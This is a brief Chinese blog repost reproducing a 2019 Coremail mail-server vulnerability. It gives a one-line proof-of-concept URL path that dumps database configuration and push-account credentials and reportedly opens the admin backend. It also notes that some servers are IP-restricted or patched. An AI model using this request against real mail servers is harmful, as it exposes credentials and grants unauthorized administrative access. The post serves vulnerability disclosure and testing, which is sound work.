POC:
mailsms/s?func=ADMIN:appState&dumpConfig=/
可以获取数据库配置信息和推送账号。
有些可能限制ip。
可以进入后台管理。
有些是404,可能打了补丁或者是老漏洞了,也可能是版本问题。
进一步获取数据失败。
coremail 配置信息泄露及接口未授权漏洞重现
POC:mailsms/s?func=ADMIN:appState&dumpConfig=/可以获取数据库配置信息和推送账号。有些可能限制ip。可以进 2019-07-07 17:24:52 Author: www.lsablog.com(查看原文) 阅读量:373 收藏
POC:mailsms/s?func=ADMIN:appState&dumpConfig=/可以获取数据库配置信息和推送账号。有些可能限制ip。可以进 2019-07-07 17:24:52 Author: www.lsablog.com(查看原文) 阅读量:373 收藏
文章来源: https://www.lsablog.com/networksec/penetration/coremail-info-leakage-and-webservice-unauthorization-reproduce/
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh